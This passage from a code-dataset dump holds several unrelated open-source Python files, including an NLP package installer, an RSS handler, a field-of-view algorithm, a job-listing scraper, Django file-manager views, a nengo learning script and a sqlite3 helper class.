nltk.download('wordnet')\n\n # Список модулей для установки\n modules = [\n \"pip install nltk\",\n \"pip install spacy\",\n \"spacy download en\",\n \"pip install pymorphy2\",\n \"pip install -U pymorphy2-dicts-ru\",\n \"pip install pymystem3\"\n ]\n\n # Переходим по всему списку модулей\n for module in modules:\n # Изменяем модуль\n module = \"%s -m %s\" % (sys.executable, module)\n\n # Выполняем установку приложения\n p = subprocess.Popen(module.split(\" \"))\n try:\n # Ожидаем выполнение процесса\n p.wait(timeout=3000)\n # Если произошел таймаут\n except subprocess.TimeoutExpired:\n # Останавливаем процесс\n p.terminate()\n # Выводим сообщение о таймауте\n print(\"Stop install module: [%s]\" % module)\n","repo_name":"anyks/asc","sub_path":"scripts/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"ru","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"32654599457","text":"from .Parsing import ParsingBase\nfrom .Parsing.handle_images import handle_img_combo\nfrom ..rss_class import Rss\n\n\n# 处理图片\n@ParsingBase.append_handler(\n parsing_type=\"picture\",\n rex=r\"https:\\/\\/www\\.youtube\\.com\\/feeds\\/videos\\.xml\\?channel_id=\",\n)\nasync def handle_picture(\n rss: Rss, state: dict, item: dict, item_msg: str, tmp: str, tmp_state: dict\n) -> str:\n\n # 判断是否开启了只推送标题\n if rss.only_title:\n return \"\"\n\n img_url = item.get(\"media_thumbnail\")[0].get(\"url\")\n res = await handle_img_combo(img_url, rss.img_proxy)\n\n # 判断是否开启了只推送图片\n if rss.only_pic:\n return f\"{res}\\n\"\n\n return f\"{tmp + res}\\n\"\n","repo_name":"mobyw/nonebot-general-rss","sub_path":"src/plugins/nonebot-general-rss/RSS/routes/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"37960503479","text":"import dataclasses\nfrom abc import ABCMeta, abstractmethod\nfrom typing import Any, Callable, List, Set, Tuple\n\n__all__ = [\"FOV\"]\n\n\n@dataclasses.dataclass\nclass Angles:\n start: float\n middle: float\n end: float\n\n\nclass FOV:\n def __init__(\n self, radius, tile_visible_func: Callable, set_tile_visible_func: Callable\n ):\n self.radius = radius\n self.tile_visible_func = tile_visible_func\n self.set_tile_visible_func = set_tile_visible_func\n\n def check_visibility(self, x: int, y: int, tiles: List[List[Any]]):\n tiles[y][x].set_visible(True)\n positions = self._check_y(x, y, -1, -1, tiles)\n positions.update(self._check_y(x, y, 1, -1, tiles))\n positions.update(self._check_y(x, y, -1, 1, tiles))\n positions.update(self._check_y(x, y, 1, 1, tiles))\n positions.update(self._check_x(x, y, -1, 1, tiles))\n positions.update(self._check_x(x, y, 1, 1, tiles))\n positions.update(self._check_x(x, y, -1, -1, tiles))\n positions.update(self._check_x(x, y, 1, -1, tiles))\n for row in positions:\n x, y = row\n self.set_tile_visible_func(tiles[y][x], True)\n\n def _is_visible(self, angles: Angles, walls: List[Angles], is_wall: bool) -> bool:\n start_vis: bool = True\n mid_vis: bool = True\n end_vis: bool = True\n\n for wall in walls:\n if wall.start <= angles.start <= wall.end:\n start_vis = False\n if wall.start <= angles.middle <= wall.end:\n mid_vis = False\n if wall.start <= angles.end <= wall.end:\n end_vis = False\n\n if is_wall:\n return start_vis or mid_vis or end_vis\n else:\n return (start_vis and mid_vis) or (mid_vis and end_vis)\n\n def _add_wall(self, walls: List[Angles], new: Angles) -> List[Angles]:\n angle: Angles = Angles(new.start, new.middle, new.end)\n new_walls: List[Angles] = [\n wall for wall in walls if not self._combine(wall, angle)\n ]\n new_walls.append(angle)\n return new_walls\n\n def _combine(self, old: Angles, new: Angles) -> bool:\n low: Angles\n high: Angles\n # if their near values are equal, they overlap\n if old.start < new.start:\n low = old\n high = new\n elif new.start < old.start:\n low = new\n high = old\n else:\n new.end = max(old.end, new.end)\n return True\n\n # If they overlap, combine and return True\n if low.end >= high.start:\n new.start = min(low.start, high.start)\n new.end = max(low.end, high.end)\n return True\n\n return False\n\n def _check_y(\n self, px: int, py: int, dx: int, dy: int, tiles: List[List[Any]]\n ) -> Set[Tuple[int, int]]:\n count = 1\n positions: Set[Tuple[int, int]] = set()\n start_y = py + dy\n height = len(tiles)\n width = len(tiles[0])\n walls: List[Angles] = []\n for y in range(0, self.radius):\n new_y = start_y + y * dy\n if 0 <= new_y < height:\n number_of_cells = count\n for x in range(0, count * dx + dx, dx):\n new_x = px + x\n if 0 <= new_x < width:\n angle_range = 1.0 / number_of_cells\n start_angle = abs(x) * angle_range\n middle_angle = start_angle + (angle_range / 2.0)\n end_angle = start_angle + angle_range\n is_wall = self.tile_visible_func(tiles[new_y][new_x])\n obj: Angles = Angles(start_angle, middle_angle, end_angle)\n if self._is_visible(obj, walls, is_wall):\n positions.add((new_x, new_y))\n if is_wall:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n else:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n count += 1\n return positions\n\n def _check_x(\n self, px: int, py: int, dx: int, dy: int, tiles: List[List[Any]]\n ) -> Set[Tuple[int, int]]:\n count = 1\n positions: Set[Tuple[int, int]] = set()\n start_x = px + dx\n height = len(tiles)\n width = len(tiles[0])\n walls: List[Angles] = []\n for x in range(0, self.radius):\n new_x = start_x + x * dx\n if 0 <= new_x < width:\n number_of_cells = count\n for y in range(0, count * dy + dy, dy):\n new_y = py + y\n if 0 <= new_y < height:\n angle_range = 1.0 / number_of_cells\n start_angle = abs(y) * angle_range\n middle_angle = start_angle + (angle_range / 2.0)\n end_angle = start_angle + angle_range\n is_wall = self.tile_visible_func(tiles[new_y][new_x])\n obj: Angles = Angles(start_angle, middle_angle, end_angle)\n if self._is_visible(obj, walls, is_wall):\n positions.add((new_x, new_y))\n if is_wall:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n else:\n walls = self._add_wall(\n walls, Angles(start_angle, middle_angle, end_angle)\n )\n count += 1\n return positions\n","repo_name":"PurityLake/PortalInTheDepths","sub_path":"pitd/fov/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22619148269","text":"import bs4\nimport pandas\nimport requests\nfrom tqdm import tqdm\nfrom fake_headers import Headers\n\nimport json\nfrom time import sleep\nfrom pprint import pprint\n\nheaders = Headers(browser='firefox', os='win')\nheaders_data = headers.generate()\n\nall_vacancy = []\n\nfor p in tqdm(range(9)):\n\n sleep(0.1)\n\n url = f'https://spb.hh.ru/search/vacancy?text=python+and+Django+and+Flask&salary=&area=2&area=1&' \\\n f'no_magic=true&ored_clusters=true&items_on_page=20&excluded_text=&page={p}'\n\n response = requests.get(url, headers=headers_data)\n\n html_data = bs4.BeautifulSoup(response.text, 'lxml')\n\n for vacancy in html_data.findAll('div', class_=\"vacancy-serp-item-body__main-info\"):\n\n vacancy_name = vacancy.find('a', class_=\"serp-item__title\").text.strip()\n\n vacancy_href = vacancy.find('a').get('href')\n\n try:\n\n vacancy_offer = vacancy.find('span', class_=\"bloko-header-section-3\").text.replace('\\u202f', ' ')\n\n except AttributeError:\n\n vacancy_offer = 'Зарплата не указана.'\n\n vacancy_company = vacancy.find('a', class_=\"bloko-link bloko-link_kind-tertiary\").text.replace('\\xa0', ' ')\n\n vacancy_town = vacancy.findAll('div', class_=\"bloko-text\")[-1].text.split(',')[0]\n\n all_vacancy.append([vacancy_name, vacancy_href, vacancy_offer, vacancy_company, vacancy_town])\n\n\n# Запись файла в формат JSON\n\nwith open('vacancies.json', 'w') as file:\n json.dump(all_vacancy, file, ensure_ascii=False, indent=2)\n\n\n# Запись файла в формат CSV\n\nheader = ['position', 'reference', 'offer', 'company', 'town']\n\ndf = pandas.DataFrame(all_vacancy, columns=header)\ndf.to_csv('vacancies.csv', sep=',', encoding='utf8')","repo_name":"s-alex-developer/Netology_HomeWorks","sub_path":"web_scraping/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1899275475","text":"from datetime import date, timedelta, datetime\r\nnumbers = list(range(0, 12000))\r\npast = 10\r\n\r\ndef lotto_date_generator(num, p=0):\r\n #lotto_days = [1, 3, 5]\r\n #lotto_days = [2, 5]\r\n lotto_days = [6]\r\n return [str(date.today() - timedelta(days = p) - timedelta(days = n)) for n in numbers if (date.today() - timedelta(days = p) - timedelta(days = n)).weekday() in lotto_days]\r\n\r\ndates = lotto_date_generator(numbers, 13667)\r\nprint(dates)\r\nprint(len(dates), (len(dates) * 8.5) / 3600 )","repo_name":"Bartelix/lotto","sub_path":"date_generator.py","file_name":"date_generator.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13950827870","text":"import json\nimport os\nimport subprocess\n\nfrom django.contrib.auth import get_backends\nfrom django.contrib.auth.models import User\nfrom django.http import (Http404, HttpResponse, HttpResponseBadRequest,\n HttpResponseForbidden, HttpResponseNotFound)\nfrom django.shortcuts import get_object_or_404, render\nfrom django.template import RequestContext, loader\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import (csrf_exempt, ensure_csrf_cookie,\n requires_csrf_token)\nfrom django.views.decorators.http import condition, require_GET, require_POST\n\nfrom .utils import FileOperations\n\n\n@requires_csrf_token\n@require_POST\ndef permissions_save(request, folder, path):\n settings = {}\n method = request.POST.get(\"permission_scheme\")\n if not method:\n return HttpResponseBadRequest(\"Missing method \"+json.dumps(request.POST))\n if method == \"Public\":\n settings[\"mode\"] = \"public\"\n if method == \"Futurice SSO\":\n settings[\"mode\"] = \"sso\"\n if method == \"Static account\":\n settings[\"mode\"] = \"basicauth\"\n if not request.POST.get(\"password\") or not request.POST.get(\"username\"):\n return HttpResponseBadRequest(\"Missing username or password\")\n settings[\"username\"] = request.POST.get(\"username\")\n settings[\"password\"] = request.POST.get(\"password\")\n data = FileOperations.save_permissions(request.user.username, folder, path, settings)\n\n return JSONResponse(data, {}, response_mimetype(request))\n\n\n@ensure_csrf_cookie\n@require_GET\ndef main(request, template_name):\n ret_dict = {\"homefolder_exists\": True}\n if not FileOperations.valid_file(request.user.username, \"public_html\", \"\"):\n ret_dict[\"homefolder_exists\"] = False\n return render(request, template_name, context=ret_dict)\n \n@ensure_csrf_cookie\n@require_GET\ndef browse(request, folder, path, template_name):\n if not FileOperations.valid_file(request.user.username, folder, path):\n raise Http404\n path = path.replace(\"//\", \"/\")\n path_parts = []\n path_parts_temp = path.split(\"/\")\n path_construct = \"\"\n for item in path_parts_temp[:-1]:\n path_construct = \"%s/%s\" % (path_construct, item)\n path_parts.append((path_construct, item))\n\n ret_dict = {\"folder\": folder, \"path\": path, \"path_parts\": path_parts, \"current_path\": path_parts_temp[-1] }\n return render(request, template_name, context=ret_dict)\n\n@ensure_csrf_cookie\n@requires_csrf_token\ndef upload(request, folder, path):\n data = []\n def get_return_dict(file):\n return {\"name\": file.get(\"filename\"), \"size\": file.get(\"size\"), 'url': url, \"mtime\": file.get(\"mtime\", 0), \"mtime_readable\": file.get(\"mtime_readable\", \"-\"), 'delete_url': reverse(\"delete\", args=[folder, path+\"/\"+file.get(\"filename\")]), \"delete_type\": \"POST\"}\n\n if request.FILES:\n files = request.FILES.get(\"files[]\")\n else:\n files = FileOperations.get_files(request.user.username, folder, path)\n for file in files:\n if os.path.isdir(file.get(\"full_path\")):\n url = reverse(\"browse\", args=[folder, path+\"/\"+ file.get(\"filename\")])\n else:\n if folder == \"public_html\":\n url = \"http://public.futurice.com/~%s/%s/%s\" % (request.user.username, path, file.get(\"filename\"))\n else:\n url = \"/~%s/%s/%s\" % (request.user.username, path, file.get(\"filename\"))\n data.append(get_return_dict(file))\n return JSONResponse(data, {}, response_mimetype(request))\n f = files\n FileOperations.upload_file(f, request.user.username, folder, path)\n\n file = FileOperations.get_file(request.user.username, folder, path, f.name)\n if os.path.isdir(file.get(\"full_path\")):\n url = reverse(\"browse\", args=[folder, path+\"/\"+ file.get(\"filename\")])\n else:\n if folder == \"public_html\":\n url = \"http://public.futurice.com/~%s/%s/%s\" % (request.user.username, path, file.get(\"filename\"))\n else:\n url = f\"/~{request.user.username}/{path}/{file.get('filename')}\"\n data.append(get_return_dict(file))\n response = JSONResponse(data, {}, response_mimetype(request))\n response['Content-Disposition'] = 'inline; filename=files.json'\n return response\n\n@require_POST\n@ensure_csrf_cookie\n@requires_csrf_token\ndef delete(request, folder, path):\n return JSONResponse(FileOperations.delete_file(request.user.username, folder, path), {}, response_mimetype(request))\n\n@require_POST\n@ensure_csrf_cookie\n@requires_csrf_token\ndef mkdir(request, folder, path):\n pathname = request.POST.get(\"pathname\")\n if not pathname:\n return HttpResponseBadRequest(\"Missing pathname\")\n\n data = FileOperations.mkdir(request.user.username, folder, path, pathname)\n if data.get(\"success\"):\n data[\"redirect\"] = reverse(\"browse\", args=[folder, path+\"/\"+pathname])\n return JSONResponse(data, {}, response_mimetype(request))\n\nclass JSONResponse(HttpResponse):\n \"\"\"JSON response class.\"\"\"\n def __init__(self,obj='',json_opts={},mimetype=\"application/json\",*args,**kwargs):\n content = json.dumps(obj,**json_opts)\n super(JSONResponse,self).__init__(content,mimetype,*args,**kwargs)\n\ndef response_mimetype(request):\n if \"application/json\" in request.META['HTTP_ACCEPT']:\n return \"application/json\"\n else:\n return \"text/plain\"\n","repo_name":"ojarva/file-manager-django","sub_path":"filemanager/files/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"73073300587","text":"from actinia_core.models.response_models import (\n LockedMapsetListResponseModel,\n SimpleResponseModel,\n)\n\n__license__ = \"GPLv3\"\n__author__ = \"Julia Haas, Guido Riembauer, Anika Weinmann\"\n__copyright__ = \"Copyright 2021-2022, mundialis GmbH & Co. KG\"\n__maintainer__ = \"mundialis GmbH & Co. KG\"\n\nget_doc = {\n \"tags\": [\"Mapsets\"],\n \"description\": \"List available or locked mapsets.\",\n \"parameters\": [\n {\n \"in\": \"path\",\n \"name\": \"mapsets\",\n \"type\": \"string\",\n \"description\": \"List all mapsets in the global database available \"\n \"to the authenticated user.\",\n },\n {\n \"in\": \"path\",\n \"name\": \"status\",\n \"type\": \"string\",\n \"description\": (\n \"If set to 'locked', list all locked mapsets across \"\n \"all locations. Minimum required user role: admin.\"\n ),\n },\n {\n \"in\": \"path\",\n \"name\": \"user\",\n \"type\": \"string\",\n \"description\": (\n \"List all mapsets in the global database available \"\n \"to the specified user. \"\n \"Minimum required user role: admin\"\n ),\n },\n ],\n \"responses\": {\n \"200\": {\n \"description\": \"Returns a list of available (or locked) mapsets \",\n \"schema\": LockedMapsetListResponseModel,\n },\n \"500\": {\n \"description\": \"The error message and a detailed error log\",\n \"schema\": SimpleResponseModel,\n },\n },\n}\n","repo_name":"actinia-org/actinia-api","sub_path":"src/actinia_api/swagger2/actinia_core/apidocs/mapsets.py","file_name":"mapsets.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"15496794916","text":"# single concatenated vector input with voja\n# used for making plot showing decoders continually switching back and forth\n\nfrom utils import gen_env_list, gen_vocab\nfrom hetero_mem import build_hetero_mem, encoders\nfrom constants import n_neurons, D, dt\n\nimport nengo\nfrom nengo import spa\n\nimport numpy as np\n\nplot_res = False\n\n# Learning rates\npes_rate = 0.01\nvoja_rate = 0.005\n\n## Generate the vocab\nrng = np.random.RandomState(0)\nnumber_dict = {\"ONE\":1, \"TWO\":2, \"THREE\":3, \"FOUR\":4, \"FIVE\":5,\n \"SIX\":6, \"SEVEN\":7, \"EIGHT\":8, \"NINE\":9}\n\nmax_sum = 5\nmax_num = max_sum - 2\n\nnumber_list, vocab = gen_vocab(number_dict, max_num, D, rng)\n\njoin_num = \"+\".join(number_list[0:max_num])\n\n## Create inputs and expected outputs\nq_list, q_norm_list, ans_list = gen_env_list(number_dict, number_list, vocab, max_sum)\n\nnum_items = len(q_list)\nperiod = 0.3\nrepeats = 5\nT = period * num_items * (1 + repeats)\nshuffled = range(0, len(q_list))\nrng.shuffle(shuffled)\nprint(shuffled)\n\n\ndef shuffle_func(t):\n if round((t % period * num_items) * 1000) == 0:\n rng.shuffle(shuffled)\n\n return shuffled\n\n\ndef cycle_array(x, period, dt=0.001):\n \"\"\"Cycles through the elements\"\"\"\n i_every = int(round(period/dt))\n if i_every != period/dt:\n raise ValueError(\"dt (%s) does not divide period (%s)\" % (dt, period))\n\n def f(t):\n i = int(round((t - dt)/dt)) # t starts at dt\n return x[shuffled[(i/i_every) % len(x)]]\n\n return f\n\n\nwith spa.SPA(vocabs=[vocab], label=\"Fast Net\", seed=0) as model:\n env_keys = nengo.Node(cycle_array(q_norm_list, period, dt))\n env_values = nengo.Node(cycle_array(ans_list, period, dt))\n shuffle_node = nengo.Node(shuffle_func)\n\n recall = nengo.Node(size_in=D)\n learning = nengo.Node(output=lambda t: -int(t >= (T-period*num_items)))\n\n ## Generate hetero mem\n K = 400\n # This is usually calculated\n c = 0.51\n e = encoders(np.array(q_norm_list), K, rng)\n het_mem = build_hetero_mem(D*2, D, e, c, pes_rate=pes_rate, voja_rate=voja_rate)\n\n nengo.Connection(env_keys, het_mem.input, synapse=None)\n nengo.Connection(het_mem.output, recall)\n\n # Create the error population\n error = nengo.Ensemble(n_neurons*8, D)\n nengo.Connection(learning, error.neurons, transform=[[10.0]]*n_neurons*8,\n synapse=None)\n nengo.Connection(learning, het_mem.in_conn.learning_rule, synapse=None)\n\n # Calculate the error and use it to drive the PES rule\n nengo.Connection(env_values, error, transform=-1, synapse=None)\n nengo.Connection(recall, error, synapse=None)\n nengo.Connection(error, het_mem.out_conn.learning_rule)\n\n # Setup probes\n p_keys = nengo.Probe(env_keys, synapse=None, sample_every=0.01)\n p_values = nengo.Probe(env_values, synapse=None, sample_every=0.01)\n p_learning = nengo.Probe(learning, synapse=None, sample_every=0.01)\n p_error = nengo.Probe(error, synapse=0.01)\n p_recall = nengo.Probe(recall, synapse=None, sample_every=0.01)\n p_weights = nengo.Probe(het_mem.out_conn, 'weights', synapse=None, sample_every=0.01)\n\nsim = nengo.Simulator(model, dt=dt)\nsim.run(T)\n\nt = sim.trange()\n\nif plot_res:\n import matplotlib.pyplot as plt\n\n # figure out how to put these into a subplot\n plt.figure()\n plt.title(\"Error\")\n plt.plot(t, np.linalg.norm(sim.data[p_error], axis=1))\n\n plt.figure()\n plt.title(\"Keys_1\")\n plt.plot(t, spa.similarity(sim.data[p_keys][:, :D], vocab))\n plt.legend(vocab.keys, loc='best')\n\n plt.figure()\n plt.title(\"Keys_2\")\n plt.plot(t, spa.similarity(sim.data[p_keys][:, D:], vocab))\n plt.legend(vocab.keys, loc='best')\n\n plt.figure()\n plt.title(\"Result\")\n plt.plot(t, spa.similarity(sim.data[p_recall], vocab))\n plt.legend(vocab.keys, loc='best')\n plt.ylim(-1.5, 1.5)\n\n plt.figure()\n plt.title(\"Actual Answer\")\n plt.plot(t, spa.similarity(sim.data[p_values], vocab))\n plt.legend(vocab.keys, loc='best')\n plt.ylim(-1.5, 1.5)\n\n plt.show()\n\n# I should make a wrapper for doing this quickly\nbase_name = \"hetmem\"\nnp.savez_compressed(\"data/%s_learning_data\" % base_name, p_keys=sim.data[p_keys], p_recall=sim.data[p_recall],\n p_error=sim.data[p_error], p_weights=sim.data[p_weights], p_values=sim.data[p_values])\nnp.savez_compressed(\"data/%s_learning_vocab\" % base_name, keys=vocab.keys, vecs=vocab.vectors)\n","repo_name":"Seanny123/counting_to_addition","sub_path":"hetmem_learning.py","file_name":"hetmem_learning.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"70569152749","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n'''\n# boo 是basic or other的缩写 意思是: 基础 或 其他未分类\n创建: 2018-1-8 08:51:50\n'''\nimport traceback # 获取错误信息\nimport sys\nimport os\nimport re\nimport time\nimport datetime\nimport urllib\nimport random\nimport socket\nimport winsound\nimport ssl\nimport json\n# custom HTTPS opener, banner's oracle 10g server supports SSLv3 only\nimport socket\nimport io, gzip\nimport hashlib\nimport sqlite3\nimport threading\n\nsys.path.append(\"..\") # 跳到上级目录下面\n# sys.path的作用是:当使用import语句导入模块时,解释器会搜索当前模块所在目录以及sys.path指定的路径去找需要import的模块\nfrom cnLib import boo\n\n# print \"cnLib\"\n# os.system('pause') #按任意键继续。\n\n# while 1:\n# pass\n\n# print __name__\n\n\n# ---------------------------------------------------------------------------\n\n'''\n# 功能:\n# 时间:\n# 返回: =0失败,=1成功\n# 参数:\n# 实例: re = demo(u'传入参数')\n'''\ndef model(IN):\n return 1 # 返回说明\n return None # 返回说明\n return True # 返回说明\n# ------------------------------------------------------------------\n\n\n'''\n实例:\n# sqlite3数据库操作\nclass db_sqlite3:\n\nrt = boo.runtime()\ndbPath = \"D:/tempD/img.db\"\nsql = \"INSERT INTO img (`name2`,`url`,`md5`,`size` ) VALUES (?,'u',?,4);\\n\"\n\ndb = iDatabase.db_sqlite3(\"D:/tempD/img.db\")\ndb.open()\ndb.runSQL_noReturn('DELETE FROM img WHERE size=4 ;')\ndb.fast_ready()\nrt.start()\n# ----------------------------------------------------------\none = {}\ni=1\nnCount = 100\nfor i in range(0,nCount):\n one['txt'] = \"要计算的has值%d\" % (i)\n one['md5'] = md5(one['txt'])\n one['sql'] = ''\n db.fast_into(\"INSERT INTO img (`name2`,`url`,`md5`,`size` ) VALUES (?, '', ?, 4 )\", (i, one['md5']))\n# ----------------------------------------------------------\ndb.fast_end()\n\nrt.end()\n# print rt.getRuntime()\nsu = -1\nif rt.getRuntime()> 0:\n su = nCount/rt.getRuntime()\n\ntxt = \"【共%d秒,循环%d次】速度= %f循环/秒\"%(rt.getRuntime(), nCount, su)\nprint(txt)\n\nprint('结束')\n'''\n# sqlite3数据库操作\nclass db_sqlite3:\n __isDebug = False\n __dataPath = None\n __conn = None\n __c = None\n __fast_count_i = 0\n __fast_count_max = 10000 # 用于控制长 执行SQL语句多少次 保存1次 数据到硬盘并重启快速模式\n\n # ------------------------------------------------------------------\n # 构造函数\n def __init__(self, path=None):\n # print \"A\"\n if path:\n self.setPath(path)\n\n # ------------------------------------------------------------------\n # 析构函数\n def __del__(self):\n # print \"Z\"\n self.close()\n\n # ------------------------------------------------------------------\n # 设置路径\n def isDebug(self, TF):\n self.__isDebug = TF\n\n # ------------------------------------------------------------------\n # 设置路径\n def setPath(self, path):\n self.__dataPath = path\n\n # ------------------------------------------------------------------\n # 打开\n def open(self):\n try:\n self.__conn = sqlite3.connect(self.__dataPath)\n self.__conn.text_factory = str ## !!!\n self.__c = self.__conn.cursor()\n except:\n if self.__isDebug:\n strArr = []\n strArr.append(\"\\033[1;31m\")\n strArr.append(\"打开-发生错误!\\n\")\n strArr.append(\"被调用的上一层函数:%s\\n\"%(sys._getframe().f_back.f_code.co_name)) # 获取调用函数名\n strArr.append(\"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name))\n strArr.append(\"详细错误信息:\\n【\\n%s】\\n\"%(traceback.format_exc()))\n strArr.append(\" \\033[0m!\")\n boo.show(''.join(strArr))\n\n\n # ------------------------------------------------------------------\n # 关闭\n def close(self):\n try:\n self.__conn.commit()\n self.__conn.close()\n except:\n return\n # if self.__isDebug:\n # showStr = \"关闭-发生错误!\\n\"\n # showStr += \"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n # errorInfo = traceback.format_exc()\n # showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n # boo.show(showStr)\n\n # ------------------------------------------------------------------\n '''\n 作用:\n 用于控制长 执行SQL语句多少次 保存1次 数据到硬盘并重启快速模式 \n 参数:\n maxNum # 默认 = 1000 用于控制长 执行SQL语句多少次 保存1次 数据到硬盘并重启快速模式 \n '''\n def fast_count_max(self,maxNum):\n if maxNum > 0:\n self.__fast_count_max = maxNum\n\n # ------------------------------------------------------------------\n '''\n 作用:\n 快速操作 - -准备/初始化\n 参数:\n maxNum # 默认 = 1000 用于控制长 执行SQL语句多少次 保存1次 数据到硬盘并重启快速模式 \n '''\n def fast_ready(self, maxNum = 0):\n # boo.show('fast_ready')\n try:\n if maxNum > 0:\n self.__fast_count_max = maxNum\n\n self.__c.execute(\"begin;\")\n except:\n if self.__isDebug:\n funcName = sys._getframe().f_back.f_code.co_name # 获取调用函数名\n # lineNumber = sys._getframe().f_back.f_lineno # 获取行号\n # from_funcation = sys._getframe().f_code.co_name # 获取当前函数名\n showStr = \"快速操作 - -准备/初始化-发生错误!\\n\"\n showStr += \"被调用的上一层函数:\" + funcName + \"\\n\"\n showStr += \"数据库:\" + self.__dataPath + \"\\n\"\n showStr += \"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n errorInfo = traceback.format_exc()\n showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n boo.show(showStr)\n\n # ------------------------------------------------------------------\n # 快速操作 - -重新-准备/初始化\n def fast_re_ready(self):\n # showStr = \"被调用的上一层函数:\" + sys._getframe().f_back.f_code.co_name + \"\\n\"\n # boo.show('快速操作 - -重新-准备/初始化_fast_re_ready_' + showStr)\n try:\n self.__conn.commit()\n self.__c.execute(\"begin;\")\n except:\n if self.__isDebug:\n showStr = \"快速操作 - -重新-准备/初始化-发生错误!\\n\"\n showStr += \"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n errorInfo = traceback.format_exc()\n showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n boo.show(showStr)\n\n # ------------------------------------------------------------------\n # 快速操作 - - 执行中\n # 返回: 操作后 自动编号的ID\n def fast_into(self, sql, paramObj):\n # boo.show(\"【%d / %d 数据库:%s\" % (self.__fast_count_i, self.__fast_count_max, self.__dataPath))\n # c.execute(\"INSERT INTO img (`name2`,`url`,`md5`,`size` ) VALUES (?, '', ?, 4 )\", (i, one['md5']))\n try:\n if self.__fast_count_max < self.__fast_count_i:\n # boo.show('fast_re_ready_快速操作 - -重新-准备/初始化')\n self.fast_re_ready() # 保存数据到硬盘并重启快速模式\n self.__fast_count_i = 0\n # else:\n # self.__fast_count_i += 1\n self.__fast_count_i += 1\n self.__c.execute(sql, paramObj)\n return self.__c.lastrowid\n except:\n if self.__isDebug:\n funcName = sys._getframe().f_back.f_code.co_name # 获取调用函数名\n # lineNumber = sys._getframe().f_back.f_lineno # 获取行号\n # from_funcation = sys._getframe().f_code.co_name # 获取当前函数名\n\n showStr = \"快速操作 - - 执行中-发生错误!\\n\"\n showStr += \"被调用的上一层函数:\" + funcName + \"\\n\"\n showStr += \"数据库:\" + self.__dataPath + \"\\n\"\n showStr += \"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n errorInfo = traceback.format_exc()\n showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n boo.show(showStr)\n\n # ------------------------------------------------------------------\n # 快速操作 - - 结束/收尾\n def fast_end(self):\n try:\n self.__conn.commit()\n except:\n if self.__isDebug:\n showStr = \"快速操作 - - 结束/收尾-发生错误!\\n\"\n showStr += \"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name)\n errorInfo = traceback.format_exc()\n showStr += \"详细错误信息:\\n【\\n\"+errorInfo+\"】\\n\"\n boo.show(showStr)\n\n # ------------------------------------------------------------------\n # 获取数据库 操作符指针\n def get_c(self):\n return self.__c\n\n # ------------------------------------------------------------------\n\n # ------------------------------------------------------------------\n # 获取第一行数据\n def getData_firstRow(self, sql):\n try:\n # cursor = self.__conn.execute(\"SELECT * from `buy5sell5`\")\n cursor = self.__conn.execute(sql)\n for row in cursor:\n return row\n except:\n if self.__isDebug:\n strArr = []\n strArr.append(\"\\033[1;31m\")\n strArr.append(\"快速操作 - - 结束/收尾-发生错误!\\n\")\n strArr.append(\"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name))\n strArr.append(\"详细错误信息:\\n【\\n%s】\\n\"%(traceback.format_exc()))\n strArr.append(\" \\033[0m!\")\n boo.show(''.join(strArr))\n # print(row)\n\n # 获取第一行数据\n # maxRow 返回最大行数 =0表示无限制\n def getData_more(self, sql,maxRow=0):\n try:\n # cursor = self.__conn.execute(\"SELECT * from `buy5sell5`\")\n cursor = self.__conn.execute(sql)\n i = 0\n outArr = [] # 返回的数组\n for row in cursor:\n if 0 == maxRow or i < maxRow:\n outArr.append(row)\n i += 1\n else:\n return outArr # 达到上限提前返回\n\n return outArr\n\n except:\n if self.__isDebug:\n strArr = []\n strArr.append(\"\\033[1;31m\")\n strArr.append(\"快速操作 - - 结束/收尾-发生错误!\\n\")\n strArr.append(\"当前位置:%s.%s\\n\"%(self.__class__,sys._getframe().f_code.co_name))\n strArr.append(\"详细错误信息:\\n【\\n%s】\\n\"%(traceback.format_exc()))\n strArr.append(\" \\033[0m!\")\n boo.show(''.join(strArr))\n # print(row)\n\n # ------------------------------------------------------------------\n\n # 没有返回的 - 执行多条sql语句\n def runSQL_many_noReturn(self,SQL):\n try:\n self.__c.executemany(SQL) # 执行多条sql语句\n self.__conn.commit()\n except:\n if self.__isDebug:\n showStr = \"执行SQL发生错误!\\n\"\n showStr += 